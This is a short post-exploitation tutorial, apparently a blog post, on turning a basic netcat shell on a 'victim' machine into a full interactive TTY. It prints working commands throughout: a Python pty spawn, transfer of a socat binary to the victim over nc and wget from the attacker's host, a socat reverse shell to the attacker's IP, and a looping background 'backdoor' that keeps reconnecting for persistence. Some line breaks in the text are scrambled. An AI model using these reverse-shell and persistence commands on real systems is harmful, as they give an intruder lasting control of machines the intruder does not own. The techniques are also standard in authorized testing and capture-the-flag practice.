Ended up with a cheap
nc shell and want to upgrade to a “real” shell with a proper TTY and navigation?
Say no more <:
1. Upgrading using shell magic
This doesn’t always work - however if Python is present on the victims machine, it’s worth a try.
bashon the attacker machine,
zshdoesn’t seem to work.
- Get the
- In the shell, execute:
python -c 'import pty; pty.spawn("/bin/sh")'
to allocate a TTY in the
for proper color support.
- Put the shell into background using CTRL+Z.
- Configure the local shell using
stty raw -echo.
fgto bring the
resetand press enter.
Now a proper shell should be present which doesn’t close connections upon CTRL+C <:
If this didn’t work, try the next method:
2. Upgrading using socat
socat can be used to create proper shell sessions. For this, a static binary of the tool is required which can be downloaded here.
First, transfer the
socat binary to the victims machine using
nc -vvlp 1337 < socat to start a server which pushes the binary to the connecting machine.
b) On the victim, execute
nc which downloads the file using
nc <IP> <PORT> > /tmp/socat. You may manually stop the download process because it won’t terminate on its own.
cd into the folder containing the binary and execute
python -m SimpleHTTPServer <PORT>.
cd /tmp && wget http://<IP>:<PORT>/socat
to download the file from the attackers machine.
After that, it’s time to spawn the shell:
- Create a
socatlistener on the attacking machine with
socat file:`tty`,raw,echo=0 tcp-listen:4444
- Spawn a proper reverse shell from the
ncshell on the victims box using:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<IP>:4444
In case the with of the shell is too small, it can be fixed like this:
- Using a new terminal, execute
stty -ato display the amount of columns and rows being used normally on the attackers machine.
- In the (
socat) shell use
stty rows <num> cols <num>to fix the width.
Create a lazy backdoor shell on the victims machine:
while true; do sleep 10; socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<IP>:<PORT>; done &
In case a previous shell breaks, just set up a new listener to be up and running again without the need to run an exploit again. Or use tsh